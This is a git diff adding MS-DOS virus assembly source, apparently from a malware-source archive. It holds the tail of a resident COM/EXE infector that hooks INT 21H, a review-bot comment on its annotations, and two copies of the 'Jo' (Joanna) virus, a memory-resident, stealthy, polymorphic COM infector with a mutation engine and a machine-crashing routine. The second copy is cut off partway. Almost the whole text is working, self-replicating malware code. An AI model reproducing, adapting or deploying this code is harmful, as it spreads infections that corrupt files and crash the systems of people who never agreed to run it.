+ MOV DX,FPTHOF ; Get pathname offset
+ PUSH DS ; \ Set ES to DS
+ POP ES ; /
+ XOR AL,AL ; Test character - zero
+ MOV CX,41H ; Maximum pathname length
+ REPNZ SCASB ; Find end of pathname
+ MOV SI,FPTHOF ; Get pathname offset
+BP0260:
+ MOV AL,[SI] ; Get pathname character
+ OR AL,AL ; Test for a character
+ JZ BP0280 ; Finish if none
+ CMP AL,61H ; Test for 'a'
+ JB BP0270 ; Branch if less
+ CMP AL,7AH ; Test for 'z'
+ JA BP0270 ; Branch if above
+ SUB BYTE PTR [SI],20H ; Convert to uppercase
+BP0270:
+ INC SI ; Address next character
+ JMP BP0260 ; Process next character
+
+BP0280:
+ MOV CX,0BH ; Load length 11
+ SUB SI,CX ; Address back by length
+ MOV DI,OFFSET COM_CM ; 'COMMAND.COM'
+ PUSH CS ; \ Set ES to CS
+ POP ES ; /
+ MOV CX,0BH ; Load length again
+ REPZ CMPSB ; Compare
+ JNZ BP0290 ; Continue if not command.com
+ JMP BP0500 ; Terminate
+
+BP0290:
+ MOV AX,4300H ; Get file attributes
+ INT 21H ; DOS service (Get attributes)
+ JB BP0300 ; Follow chain of error branches
+ MOV F_ATTS,CX ; Save file attributes
+BP0300:
+ JB BP0320 ; Follow chain of error branches
+ XOR AL,AL ; Scan character - zero
+ MOV EXE_SW,AL ; Set EXE switch off
+ PUSH DS ; \ Set ES to DS
+ POP ES ; /
+ MOV DI,DX ; Pointer to pathname
+ MOV CX,41H ; Maximum pathname length
+ REPNZ SCASB ; Find end of pathname
+ CMP BYTE PTR [DI-2],4DH ; Is last letter 'M'
+ JZ BP0310 ; Branch if yes
+ CMP BYTE PTR [DI-2],6DH ; Is last letter 'm'
+ JZ BP0310 ; Branch if yes
+ INC EXE_SW ; Set EXE switch on
+BP0310:
+ MOV AX,3D00H ; Open handle, read only
+ INT 21H ; DOS service (Open handle)
+BP0320:
+ JB BP0340 ; Follow chain of error branches
+ MOV F_HAND,AX ; Save file handle
+ MOV BX,AX ; File handle
+ MOV AX,4202H ; Move file pointer
+ MOV CX,-1 ; \ End of file minus 5
+ MOV DX,-5 ; /
+ INT 21H ; DOS service (Move pointer)
+ JB BP0320 ; Follow chain of error branches
+ ADD AX,5 ; Total file size
+ MOV F_SIZE,AX ; Save total file size
+ MOV CX,5 ; Length to read
+ MOV DX,OFFSET SIGBUF ; Infection test buffer
+ MOV AX,CS ; \
+ MOV DS,AX ; ) Make DS & ES same as CS
+ MOV ES,AX ; /
+ ASSUME DS:CODE
+ MOV AH,3FH ; Read handle
+ INT 21H ; DOS service (Read handle)
+ MOV DI,DX ; Address test buffer
+ MOV SI,OFFSET VR_SIG ; Signature
+ REPZ CMPSB ; Compare signatures
+ JNZ BP0330 ; Branch if not infected
+ MOV AH,3EH ; Close handle
+ INT 21H ; DOS service (Close handle)
+ JMP BP0500 ; Terminate
+
+BP0330:
+ MOV AX,3524H ; Get interrupt 24H
+ INT 21H ; DOS service (Get int)
+ MOV I24OFF,BX ; Save interrupt 24H offset
+ MOV I24SEG,ES ; Save interrupt 24H segment
+ MOV DX,OFFSET BP0090 ; Interrupt 24H routine
+ MOV AX,2524H ; Set interrupt 24H
+ INT 21H ; DOS service (Set int)
+ LDS DX,F_PATH ; Address program pathname
+ XOR CX,CX ; No attributes
+ MOV AX,4301H ; Set file attributes
+ INT 21H ; DOS service (Set attributes)
+ ASSUME DS:NOTHING
+BP0340:
+ JB BP0350 ; Follow chain of error branches
+ MOV BX,F_HAND ; Get file handle
+ MOV AH,3EH ; Close handle
+ INT 21H ; DOS service (Close handle)
+ MOV F_HAND,-1 ; No file handle
+ MOV AX,3D02H ; Open handle read/write
+ INT 21H ; DOS service (Open handle)
+ JB BP0350 ; Follow chain of error branches
+ MOV F_HAND,AX ; Save file handle
+ MOV AX,CS ; \
+ MOV DS,AX ; ) Make DS & ES same as CS
+ MOV ES,AX ; /
+ ASSUME DS:CODE
+ MOV BX,F_HAND ; Get file handle
+ MOV AX,5700H ; Get file date and time
+ INT 21H ; DOS service (Get file date)
+ MOV F_DATE,DX ; Save file date
+ MOV F_TIME,CX ; Save file time
+ MOV AX,4200H ; Move file pointer
+ XOR CX,CX ; \ Beginning of file
+ MOV DX,CX ; /
+ INT 21H ; DOS service (Move pointer)
+BP0350:
+ JB BP0380 ; Follow chain of error branches
+ CMP EXE_SW,0 ; Test EXE switch
+ JZ BP0360 ; Branch if off
+ JMP BP0400
+
+ ; .COM file processing
+
+BP0360:
+ MOV BX,1000H ; 64K of memory wanted
+ MOV AH,48H ; Allocate memory
+ INT 21H ; DOS service (Allocate memory)
+ JNB BP0370 ; Branch if successful
+ MOV AH,3EH ; Close handle
+ MOV BX,F_HAND ; Get file handle
+ INT 21H ; DOS service (Close handle)
+ JMP BP0500 ; Terminate
+
+BP0370:
+ INC MEM_SW ; Set on memory allocated switch
+ MOV ES,AX ; Segment of allocated memory
+ XOR SI,SI ; Start of virus
+ MOV DI,SI ; Start of allocated memory
+ MOV CX,OFFSET ENDADR ; Length of virus
+ REPZ MOVSB ; Copy virus to allocated
+ MOV DX,DI ; Address after virus
+ MOV CX,F_SIZE ; Total file size
+ MOV BX,F_HAND ; Get file handle
+ PUSH ES ; \ Set DS to ES
+ POP DS ; /
+ MOV AH,3FH ; Read handle
+ INT 21H ; DOS service (Read handle)
+BP0380:
+ JB BP0390 ; Follow chain of error branches
+ ADD DI,CX ; Add previous file size
+ XOR CX,CX ; \ Beginning of file
+ MOV DX,CX ; /
+ MOV AX,4200H ; Move file pointer
+ INT 21H ; DOS service (Move pointer)
+ MOV SI,OFFSET VR_SIG ; Signature
+ MOV CX,5 ; Length to move
+ REPZ MOVS [DI],CS:VR_SIG ; Copy signature to end
+ MOV CX,DI ; Length to write
+ XOR DX,DX ; Start of allocated
+ MOV AH,40H ; Write handle
+ INT 21H ; DOS service (Write handle)
+BP0390:
+ JB BP0410 ; Follow chain of error branches
+ JMP BP0480 ; Free memory and reset values
+
+ ; .EXE file processing
+
+BP0400:
+ MOV CX,1CH ; Length of EXE header
+ MOV DX,OFFSET EXEHED ; .EXE header store
+ MOV AH,3FH ; Read handle
+ INT 21H ; DOS service (Read handle)
+BP0410:
+ JB BP0430 ; Follow chain of error branches
+ MOV EXHD09,1984H ; Negative checksum
+ MOV AX,EXHD07 ; \ Store initial stack segment
+ MOV PRG_SS,AX ; /
+ MOV AX,EXHD08 ; \ Store initial stack pointer
+ MOV PRG_SP,AX ; /
+ MOV AX,EXHD10 ; \ Store initial code offset
+ MOV PRGOFF,AX ; /
+ MOV AX,EXHD11 ; \ Store initial code segment
+ MOV PRGSEG,AX ; /
+ MOV AX,EXHD02 ; Get size of file in pages
+ CMP EXHD01,0 ; Number of bytes in last page
+ JZ BP0420 ; Branch if none
+ DEC AX ; One less page
+BP0420:
+ MUL BYTSEC ; Bytes per sector
+ ADD AX,EXHD01 ; \ Add bytes in last page
+ ADC DX,0 ; /
+ ADD AX,0FH ; \ Round up
+ ADC DX,0 ; /
+ AND AX,0FFF0H ; Clear bottom figure
+ MOV F_SIZ1,AX ; Save low-order file size
+ MOV F_SIZ2,DX ; Save high-order file size
+ ADD AX,OFFSET ENDADR ; \ Add virus length
+ ADC DX,0 ; /
+BP0430:
+ JB BP0450 ; Follow chain of error branches
+ DIV BYTSEC ; Bytes per sector
+ OR DX,DX ; Test odd bytes
+ JZ BP0440 ; Branch if none
+ INC AX ; One more page for odd bytes
+BP0440:
+ MOV EXHD02,AX ; Store size of file in pages
+ MOV EXHD01,DX ; Store bytes in last page
+ MOV AX,F_SIZ1 ; Low-order file size
+ MOV DX,F_SIZ2 ; High-order file size
+ DIV PARAGR ; Size of a paragraph
+ SUB AX,EXHD04 ; Size of header in paragraphs
+ MOV EXHD11,AX ; Initial code segment
+ MOV EXHD10,OFFSET BP0030 ; Initial code offset
+ MOV EXHD07,AX ; Initial stack segment
+ MOV EXHD08,OFFSET ENDADR ; Initial stack pointer
+ XOR CX,CX ; \ Beginning of file
+ MOV DX,CX ; /
+ MOV AX,4200H ; Move file pointer
+ INT 21H ; DOS service (Move pointer)
+BP0450:
+ JB BP0460 ; Follow chain of error branches
+ MOV CX,1CH ; Length of EXE header
+ MOV DX,OFFSET EXEHED ; .EXE header store
+ MOV AH,40H ; Write handle
+ INT 21H ; DOS service (Write handle)
+BP0460:
+ JB BP0470 ; Follow chain of error branches
+ CMP AX,CX ; Has same length been written
+ JNZ BP0480 ; Branch if not
+ MOV DX,F_SIZ1 ; Low-order file size
+ MOV CX,F_SIZ2 ; High-order file size
+ MOV AX,4200H ; Move file pointer
+ INT 21H ; DOS service (Move pointer)
+BP0470:
+ JB BP0480 ; Follow chain of error branches
+ XOR DX,DX ; Address beginning of virus
+ MOV CX,OFFSET ENDADR ; Length of virus
+ MOV AH,40H ; Write handle
+ INT 21H ; DOS service (Write handle)
+ ASSUME DS:NOTHING
+BP0480:
+ CMP MEM_SW,0 ; Test memory allocated switch
+ JZ BP0490 ; Branch if off
+ MOV AH,49H ; Free allocated memory
+ INT 21H ; DOS service (Free memory)
+BP0490:
+ CMP F_HAND,-1 ; Test file handle
+ JZ BP0500 ; Terminate if none
+ MOV BX,F_HAND ; Get file handle
+ MOV DX,F_DATE ; Get file date
+ MOV CX,F_TIME ; Get file time
+ MOV AX,5701H ; Set file date and time
+ INT 21H ; DOS service (Set file date)
+ MOV AH,3EH ; Close handle
+ INT 21H ; DOS service (Close handle)
+ LDS DX,F_PATH ; Address program pathname
+ MOV CX,F_ATTS ; Load file attributes
+ MOV AX,4301H ; Set file attributes
+ INT 21H ; DOS service (Set attributes)
+ LDS DX,INT_24 ; Original interrupt 24H address
+ MOV AX,2524H ; Set interrupt 24H
+ INT 21H ; DOS service (Set int)
+BP0500:
+ POP ES
+ POP DS
+ POP DI
+ POP SI
+ POP DX
+ POP CX
+ POP BX
+ POP AX
+ POPF
+ JMP INT_21 ; Interrupt 21H
+
+ DB 11 DUP (0)
+
+ENDKEEP EQU $
+
+ ; Stack area - rubbish
+
+ DB 04DH, 09BH, 018H, 004H, 000H, 000H, 000H, 000H
+ DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H
+ DB 000H, 001H, 000H, 000H, 000H, 000H, 000H, 032H
+ DB 000H, 000H, 000H, 02FH, 000H, 0FFH, 0FFH, 0FFH
+ DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH
+ DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 043H
+ DB 03AH, 05CH, 041H, 055H, 054H, 04FH, 045H, 058H
+ DB 045H, 043H, 02EH, 042H, 041H, 054H, 000H, 061H
+ DB 075H, 074H, 06FH, 065H, 078H, 065H, 063H, 00DH
+ DB 000H, 0FFH, 0FFH, 0FFH, 000H, 000H, 000H, 000H
+ DB 04DH, 09BH, 018H, 000H, 010H, 09AH, 0F0H, 0FEH
+ DB 01DH, 0F0H, 02FH, 001H, 09BH, 018H, 03CH, 001H
+ DB 0E9H, 092H, 000H, 073H, 055H, 04DH, 073H, 044H
+ DB 06FH, 073H, 000H, 001H, 026H, 01CH, 000H, 000H
+ DB 000H, 074H, 02AH, 0ABH, 000H, 0CDH, 017H, 060H
+ DB 014H, 09FH, 002H, 056H, 005H, 09BH, 018H, 053H
+ DB 03AH, 000H, 000H, 000H, 000H, 000H, 000H, 000H
+ DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H
+ DB 000H, 0B5H, 01BH, 080H, 000H, 000H, 000H, 080H
+ DB 000H, 0B5H, 01BH, 05CH, 000H, 0B5H, 01BH, 06CH
+ DB 000H, 0B5H, 01BH, 010H, 007H, 0EDH, 014H, 0C5H
+ DB 000H, 0EDH, 014H, 046H, 002H, 0A1H, 000H, 04DH
+ DB 05AH, 0F0H, 000H, 0B2H, 000H, 038H, 001H, 060H
+ DB 000H, 0D3H, 006H, 0FFH, 0FFH, 05EH, 015H, 010H
+ DB 007H, 084H, 019H, 0C5H, 000H, 05EH, 015H, 01EH
+ DB 000H, 000H, 000H, 037H, 020H, 02AH, 02AH, 02AH
+ DB 005H, 000H, 020H, 000H, 030H, 00FH, 000H, 060H
+ DB 000H, 002H, 010H, 000H, 0E0H, 05BH, 001H, 000H
+ DB 0B9H, 041H, 02AH, 09BH, 043H, 04FH, 04DH, 04DH
+ DB 041H, 04EH, 044H, 02EH, 043H, 04FH, 04DH, 001H
+ DB 000H, 000H, 000H, 000H, 000H, 0FCH, 0B4H, 0E0H
+ DB 0CDH, 021H, 080H, 0FCH, 0E0H, 073H, 016H, 080H
+ DB 0FCH, 003H, 072H, 011H, 0B4H, 0DDH, 0BFH, 000H
+ DB 001H, 0BEH, 010H, 007H, 003H, 0F7H, 02EH, 08BH
+
+ENDADR EQU $
+
+CODE ENDS
+
+ END START
+
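Review bot: The comment on `CMP AH,3 ; Test for standard "yes"` at BP0030 describes a test that never takes effect: the next instruction is `POP ES`, so the flags are discarded and any reply with AH below E0H reaches `JMP PROGRM`, whereas the same compare at BP0010 is followed by `JB BP0020`. The instruction itself should stay, since the listing is meant to re-assemble to the original bytes, but the comment should say so, e.g. `CMP AH,3 ; Result unused - falls through to host regardless`. For analysts using this file as a reference, the top-of-file comment could also name the two observable markers the listing establishes: the INT 21H AH=E0H query answered with AX=0300H at BP0130, and the five-byte VR_SIG ('MsDos') trailer compared at BP0320.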
diff --git a/MSDOS/Virus.MSDOS.Unknown.jo1_11.asm b/MSDOS/Virus.MSDOS.Unknown.jo1_11.asm
new file mode 100644
index 00000000..b96db356
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.jo1_11.asm
@@ -0,0 +1,429 @@
+ NAME Jo
+ PAGE 55,132
+ TITLE Jo Virus.
+
+;
+; This is Yet another virus from the ARCV, this one is called
+; Joanna, it was written by Apache Warrior, ARCV President.
+;
+; It has Stealth features, it is a Resident infector of .COM files
+; and uses the Cybertech Mutation Engine (TM) by Apache Warrior for
+; its Polymorphic features. There is a maximum of 3 unchanged bytes
+; in the Encrypted code.
+;
+
+.model tiny
+
+code segment
+
+ ASSUME CS:CODE,DS:CODE,ES:CODE
+
+int_21ofs equ 84h
+int_21seg equ 86h
+length equ offset handle-offset main
+msglen equ offset oldstart-offset msg
+tsrlen equ (offset findat-offset main)/10
+len equ offset handle-offset main
+virlen equ (offset string-offset main2)/2
+decryptlen equ offset main2-offset main
+
+ org 100h
+
+start: jmp main
+ db 0,0,0
+
+main: mov si,offset main2 ; SI offset for decrypt
+ mov cx,virlen ; viri decrypt size
+loop_1:
+ db 2eh,81h,2ch ; decrypt
+switch: dw 0
+ add si,02h
+ dec cx
+ jnz loop_1
+main2: call findoff ; find file ofset
+findoff: pop si ;
+ sub si,offset findoff
+ push ds
+ push es
+ push cs
+ pop ds
+ push cs
+ pop es
+ mov ax,0ff05h ; Test for Scythe2 Boot
+ int 13h
+ cmp ah,0e9h ; Check for Scythe2 Boot
+ jnz haha ; no go on
+ mov ah,09h ; Display message
+ lea dx,[si+offset msg2]
+ int 21h
+ jmp $ ; Crash the machine
+haha: mov ah,2ah ; Date Test
+ int 21h ;
+ cmp dx,1210h ; Is month the Oct.
+ jnz main3 ; no go on
+ mov ah,09h ; Display Message
+ lea dx,[si+offset msg]
+ int 21h
+
+
+main3: mov di,0100h ; move old programs
+ push si ; start back to the start
+ mov ax,offset oldstart ;
+ add si,ax ;
+ mov cx,05h ;
+ cld ;
+ repz movsb ;
+
+inst: mov ax,0ffa4h ; check to see if already instaled
+ int 21h
+ pop si ; bring back si
+ cmp ax,42a1h
+ je oldprog ; Yes return to old program
+
+tt2: xor ax,ax ; Residency Routine
+ push ax
+ mov ax,ds ; Get MCB segment Address
+ dec ax ;
+ mov es,ax ; Put MCB segment Address in es
+ pop ds ;
+ mov ax,word ptr ds:int_21ofs ; Load Int 21h address data
+ mov cx,word ptr ds:int_21seg ;
+ mov word ptr cs:[si+int21],ax ; Move Int 21h data to store
+ mov word ptr cs:[si+int21+2],cx ;
+ cmp byte ptr es:[0],5ah ; Check for Start of MCB
+ jne oldprog ; If no then quit
+ mov ax,es:[3] ; Play with MCB to get top of
+ sub ax,0bch ; Memory and reserve 3,008 bytes
+ jb oldprog ; for Virus
+ mov es:[3],ax ;
+ sub word ptr es:[12h],0bch ;
+ mov es,es:[12h] ;
+ push ds ;
+ push cs ;
+ pop ds ; Move Virus into Memory
+ mov di,0100h ; space allocated above
+ mov cx,len+5 ;
+ push si ;
+ add si,0100h ;
+ rep movsb ;
+ pop si
+ pop ds
+ cli ; Stop Interrupts Very Inportant
+ mov ax,offset new21 ; Load New Int 21h handler
+ mov word ptr ds:int_21ofs,ax ; address and store
+ mov word ptr ds:int_21seg,es ;
+ sti ;
+
+oldprog:
+ mov di,0100h ; Return to Orginal
+ pop es ; Program..
+ pop ds ;
+ push di ;
+ ret ;
+
+int21 dd 0h ; Storage For Int 21h Address
+
+;
+; New interupt 21h Handler
+;
+
+sayitis: mov ax,42a1h ; Install Check..
+ iret
+
+new21: ;nop ; Sign byte
+ cmp ax,0ffa4h ; Instalation Check
+ je sayitis
+ cmp ah,11h ; FCB Search file
+ je adjust_FCB
+ cmp ah,12h ; FCB Search Again
+ je adjust_FCB
+ cmp ah,4eh ; Handle Search file
+ je adjust_FCB
+ cmp ah,4fh ; Handle Search Again
+ je adjust_FCB
+ cmp ah,3dh ; Are they opening a file?
+ je intgo ; if no ignore
+ cmp ah,4bh ; Exec Function
+ jne noint
+intgo: push ax ; 4bh, 3dh Infect file
+ push bx ; Handler save the Registers
+ push cx
+ push es
+ push si
+ push di
+ push dx
+ push ds
+ call checkit ; Call infect routine
+ pop ds
+ pop dx
+ pop di
+ pop si
+ pop es
+ pop cx
+ pop bx
+ pop ax
+noint: jmp cs:[int21] ; Return to Orginal Int 21h
+
+adjust_FCB: push es ; Stealth Routine
+ push bx
+ push si
+ push ax
+ xor si,si
+ and ah,40h ; Check for handle Search
+ jz okFCB
+ mov si,1 ; Set flag
+okFCB: mov ah,2fh ; Get DTA Address
+ int 21h
+ pop ax ; Restore ax to orginal function
+ call i21 ; value call it
+ pushf ; save flags
+ push ax ; save ax error code
+ call adjust ; Call stealth adjust routine
+ pop ax ; restore registers
+ popf
+ pop si
+ pop bx
+ pop es
+ retf 2 ; Return to caller
+
+adjust: pushf ; Stealth check routine
+ cmp si,0 ; Check flag set earlyer
+ je fcb1
+ popf
+ jc repurn ; Check for Handle Search error
+ mov ah,byte ptr es:[bx+16h] ; No error then carry on
+ and ah,01ah ; Check stealth stamp
+ cmp ah,01ah ;
+ jne repurn ;
+ sub word ptr es:[bx+1ah],len ; Infected then take the viri size
+repurn: ret ; from file size.
+fcb1: popf ; Same again but for the FCB
+ cmp al,0ffh
+ je meat_hook
+ cmp byte ptr es:[bx],0ffh
+ jne xx2
+ add bx,7
+xx2: mov ah,byte ptr es:[bx+17h]
+ and ah,01ah
+ cmp ah,01ah
+ jne meat_hook
+ sub word ptr es:[bx+1dh],len
+meat_hook: ret
+
+com_txt db 'COM',0 ;
+
+reset: ; File Attrib routines
+ mov cx,20h
+set_back:
+ mov al,01h
+find_att:
+ mov ah,43h ; Alter file attributes
+i21: pushf
+ call cs:[int21]
+exitsub: ret
+
+checkit: ; Infect routine
+ push es ; Save some more registers
+ push ds
+ push ds ; Check to see if file is a
+ pop es ; .COM file if not then
+ push dx ; quit..
+ pop di ;
+ mov cx,0ffh ; Find '.' in File Name
+ mov al,'.' ;
+ repnz scasb ;
+ push cs ;
+ pop ds ;
+ mov si,offset com_txt ; Compare with COM extension
+ mov cx,3 ;
+ rep cmpsb ;
+ pop ds ; Restore Reg...
+ pop es ;
+ jnz exitsub ;
+
+foundtype: sub di,06h ; Check for commaND.com
+ cmp ds:[di],'DN' ; Quit if found..
+ je exitsub ;
+ mov word ptr cs:[nameptr],dx ; Save DS:DX pointer for later
+ mov word ptr cs:[nameptr+2],ds ;
+ mov al,00h ; Find Attributes of file to infect
+ call find_att ;
+ jc exitsub ; Error Quit.
+
+alteratr: mov cs:[attrib],cx ; Save them
+ call reset ; Reset them to normal
+
+ mov ax,3d02h ; Open file
+ call i21
+ jc exitsub ; Error Quit
+ push cs ; Set DS to CS
+ pop ds ;
+ mov ds:[handle],ax ; Store handle
+
+ mov ax,5700h ; Read file time and date
+ mov bx,ds:[handle] ;
+ call i21 ;
+ke9: mov ds:[date],dx ; Save DX
+ or cx,1ah ; Set Stealth Stamp
+ mov ds:[time],cx ; Save CX
+
+ mov ah,3fh ; Read in first 5 bytes
+ mov cx,05h ; To save them
+ mov dx,offset oldstart ;
+ call i21 ;
+closeit: jc close2 ; Error Quit
+
+ mov ax,4202h ; Move filepointer to end
+ mov cx,0ffffh ; -5 bytes offset from end
+ mov dx,0fffbh ;
+ call i21 ;
+ jc close ; Error Quit
+
+ mov word ptr cs:si_val,ax ; Save File saize for later
+ cmp ax,0ea60h ; See if too big
+ jae close ; Yes then Quit
+
+ mov ah,3fh ; Read in last 5 bytes
+ mov cx,05h ;
+ mov dx,offset tempmem ;
+ call i21 ;
+ jc close ; Error
+
+ push cs ; Reset ES to CS
+ pop es ;
+ mov di,offset tempmem ; Check if Already infected
+ mov si,offset string ;
+ mov cx,5 ;
+ rep cmpsb ;
+ jz close ; Yes the Close and Quit
+
+zapfile: ; No Infect and Be Damned
+ mov ax,word ptr cs:si_val ;
+ add ax,2 ;
+ push cs ;
+ pop ds ;
+ mov word ptr ds:[jpover+1],ax ; Setup new jump
+ call mut_eng ; Call Mutation Engine
+ mov ah,40h ; Save prog to end of file
+ mov bx,cs:[handle] ; Load Handle
+ mov cx,length ; LENGTH OF PROGRAM****
+ call i21 ; Write away
+close2: jc close ; Quit if error
+
+ push cs ; Reset DS to CS
+ pop ds ;
+ mov ax,4200h ; Move File pointer to start
+ xor cx,cx ; of file
+ cwd ; Clever way to XOR DX,DX
+ call i21 ;
+ jc close ; Error Quit..
+
+ mov ah,40h ; Save new start
+ mov cx,03h ;
+ mov dx,offset jpover ;
+ call i21 ;
+
+close: mov ax,5701h ; Restore Time and Date
+ mov bx,ds:[handle] ;
+ mov cx,ds:[time] ;
+ mov dx,ds:[date] ;
+ call i21 ;
+ mov ah,3eh ; Close file
+ call i21 ;
+exit_sub: mov dx,word ptr [nameptr] ; Reset Attributes to as they where
+ mov cx,ds:[attrib] ;
+ mov ds,word ptr cs:[nameptr+2] ;
+ call set_back ;
+ ret ; Return to INT 21h Handler
+
+
+;
+; CyberTech Mutation Engine
+;
+; This is Version Two of the Mutation Engine
+; Unlike others it is very much Virus Specific.. Works
+; Best on Resident Viruses..
+;
+; To Call
+;
+; si_val = File Size
+;
+; Returns
+; DS:DX = Encrypted Virus Code, Use DS:DX pointer to
+; Write From..
+
+
+mut_eng:
+ mov ah,2ch ; Get Time
+ call i21 ;
+ mov word ptr ds:[switch],dx ; Use Sec./100th counter as key
+ mov word ptr ds:[switch2+1],dx ; Save to Decrypt and Encrypt
+ mov ax,cs:[si_val] ; Get file size
+ mov dx,offset main2 ;
+ add ax,dx ;
+ mov word ptr [main+1],ax ; Store to Decrypt offset
+ xor byte ptr [loop_1+2],28h ; Toggle Add/Sub
+ xor byte ptr switch2,28h ; "
+ push cs ; Reset Segment Regs.
+ pop ds ;
+ push cs ;
+ pop ax ; Find Spare Segment
+ sub ax,0bch ; and put in es
+ mov es,ax ;
+ mov si,offset main ; Move Decrypt function
+ mov di,0100h ;
+ mov cx,decryptlen ;
+ rep movsb ;
+ mov si,offset main2 ; Start the code encrypt
+ mov cx,virlen ;
+loop_10: lodsw ;
+switch2: add ax,0000 ;
+ stosw ;
+ loop loop_10 ;
+ mov si,offset string ; move ID string to end
+ mov cx,5 ; new code
+ rep movsb ;
+ mov dx,0100h ; Set Registers to encrypted Virus
+ push es ; Location
+ pop ds ;
+ ret ; Return
+
+; Data Section, contains Messages etc.
+
+
+; Little message to the Wife to Be..
+
+msg db 'Looking Good Slimline Joanna.',0dh,0ah
+ db 'Made in England by Apache Warrior, ARCV Pres.',0dh,0ah,0ah
+ db 'Jo Ver.
1.11 (c) Apache Warrior 92.',0dh,0ah
+ db '$'
+
+msg2 db 'I Love You Joanna, Apache..',0dh,0ah,'$'
+
+virus_name db '[JO]',00h, ; Virus Name..
+author db 'By Apache Warrior, ARCV Pres.' ; Thats me..
+filler dd 0h
+
+oldstart: mov ax,4c00h ; Orginal program start
+ int 21h
+ nop
+ nop
+
+j100h dd 0100h ; Stores for jumps etc
+jpover db 0e9h,00,00h ;
+
+string db '65fd3' ; ID String
+
+heap: ; This code is not saved
+handle dw 0h
+nameptr dd 0h
+attrib dw 0h
+date dw 0h
+time dw 0h
+tempmem db 10h dup (?)
+findat db 0h
+si_val dw 0h
+
+code ends
+
+end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.jo_v111.asm b/MSDOS/Virus.MSDOS.Unknown.jo_v111.asm
new file mode 100644
index 00000000..9e810efd
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.jo_v111.asm
@@ -0,0 +1,429 @@
+ NAME Jo
+ PAGE 55,132
+ TITLE Jo Virus.
+
+;
+; This is Yet another virus from the ARCV, this one is called
+; Joanna, it was written by Apache Warrior, ARCV President.
+;
+; It has Stealth features, it is a Resident infector of .COM files
+; and uses the Cybertech Mutation Engine (TM) by Apache Warrior for
+; its Polymorphic features. There is a maximum of 3 unchanged bytes
+; in the Encrypted code.
+;
+
+.model tiny
+
+code segment
+
+ ASSUME CS:CODE,DS:CODE,ES:CODE
+
+int_21ofs equ 84h
+int_21seg equ 86h
+length equ offset handle-offset main
+msglen equ offset oldstart-offset msg
+tsrlen equ (offset findat-offset main)/10
+len equ offset handle-offset main
+virlen equ (offset string-offset main2)/2
+decryptlen equ offset main2-offset main
+
+ org 100h
+
+start: jmp main
+ db 0,0,0
+
+main: mov si,offset main2 ; SI offset for decrypt
+ mov cx,virlen ; viri decrypt size
+loop_1:
+ db 2eh,81h,2ch ; decrypt
+switch: dw 0
+ add si,02h
+ dec cx
+ jnz loop_1
+main2: call findoff ; find file ofset
+findoff: pop si ;
+ sub si,offset findoff
+ push ds
+ push es
+ push cs
+ pop ds
+ push cs
+ pop es
+ mov ax,0ff05h ; Test for Scythe2 Boot
+ int 13h
+ cmp ah,0e9h ; Check for Scythe2 Boot
+ jnz haha ; no go on
+ mov ah,09h ; Display message
+ lea dx,[si+offset msg2]
+ int 21h
+ jmp $ ; Crash the machine
+haha: mov ah,2ah ; Date Test
+ int 21h ;
+ cmp dx,1210h ; Is month the Oct.
+ jnz main3 ; no go on
+ mov ah,09h ; Display Message
+ lea dx,[si+offset msg]
+ int 21h
+
+
+main3: mov di,0100h ; move old programs
+ push si ; start back to the start
+ mov ax,offset oldstart ;
+ add si,ax ;
+ mov cx,05h ;
+ cld ;
+ repz movsb ;
+
+inst: mov ax,0ffa4h ; check to see if already instaled
+ int 21h
+ pop si ; bring back si
+ cmp ax,42a1h
+ je oldprog ; Yes return to old program
+
+tt2: xor ax,ax ; Residency Routine
+ push ax
+ mov ax,ds ; Get MCB segment Address
+ dec ax ;
+ mov es,ax ; Put MCB segment Address in es
+ pop ds ;
+ mov ax,word ptr ds:int_21ofs ; Load Int 21h address data
+ mov cx,word ptr ds:int_21seg ;
+ mov word ptr cs:[si+int21],ax ; Move Int 21h data to store
+ mov word ptr cs:[si+int21+2],cx ;
+ cmp byte ptr es:[0],5ah ; Check for Start of MCB
+ jne oldprog ; If no then quit
+ mov ax,es:[3] ; Play with MCB to get top of
+ sub ax,0bch ; Memory and reserve 3,008 bytes
+ jb oldprog ; for Virus
+ mov es:[3],ax ;
+ sub word ptr es:[12h],0bch ;
+ mov es,es:[12h] ;
+ push ds ;
+ push cs ;
+ pop ds ; Move Virus into Memory
+ mov di,0100h ; space allocated above
+ mov cx,len+5 ;
+ push si ;
+ add si,0100h ;
+ rep movsb ;
+ pop si
+ pop ds
+ cli ; Stop Interrupts Very Inportant
+ mov ax,offset new21 ; Load New Int 21h handler
+ mov word ptr ds:int_21ofs,ax ; address and store
+ mov word ptr ds:int_21seg,es ;
+ sti ;
+
+oldprog:
+ mov di,0100h ; Return to Orginal
+ pop es ; Program..
+ pop ds ;
+ push di ;
+ ret ;
+
+int21 dd 0h ; Storage For Int 21h Address
+
+;
+; New interupt 21h Handler
+;
+
+sayitis: mov ax,42a1h ; Install Check..
+ iret
+
+new21: ;nop ; Sign byte
+ cmp ax,0ffa4h ; Instalation Check
+ je sayitis
+ cmp ah,11h ; FCB Search file
+ je adjust_FCB
+ cmp ah,12h ; FCB Search Again
+ je adjust_FCB
+ cmp ah,4eh ; Handle Search file
+ je adjust_FCB
+ cmp ah,4fh ; Handle Search Again
+ je adjust_FCB
+ cmp ah,3dh ; Are they opening a file?
+ je intgo ; if no ignore
+ cmp ah,4bh ; Exec Function
+ jne noint
+intgo: push ax ; 4bh, 3dh Infect file
+ push bx ; Handler save the Registers
+ push cx
+ push es
+ push si
+ push di
+ push dx
+ push ds
+ call checkit ; Call infect routine
+ pop ds
+ pop dx
+ pop di
+ pop si
+ pop es
+ pop cx
+ pop bx
+ pop ax
+noint: jmp cs:[int21] ; Return to Orginal Int 21h
+
+adjust_FCB: push es ; Stealth Routine
+ push bx
+ push si
+ push ax
+ xor si,si
+ and ah,40h ; Check for handle Search
+ jz okFCB
+ mov si,1 ; Set flag
+okFCB: mov ah,2fh ; Get DTA Address
+ int 21h
+ pop ax ; Restore ax to orginal function
+ call i21 ; value call it
+ pushf ; save flags
+ push ax ; save ax error code
+ call adjust ; Call stealth adjust routine
+ pop ax ; restore registers
+ popf
+ pop si
+ pop bx
+ pop es
+ retf 2 ; Return to caller
+
+adjust: pushf ; Stealth check routine
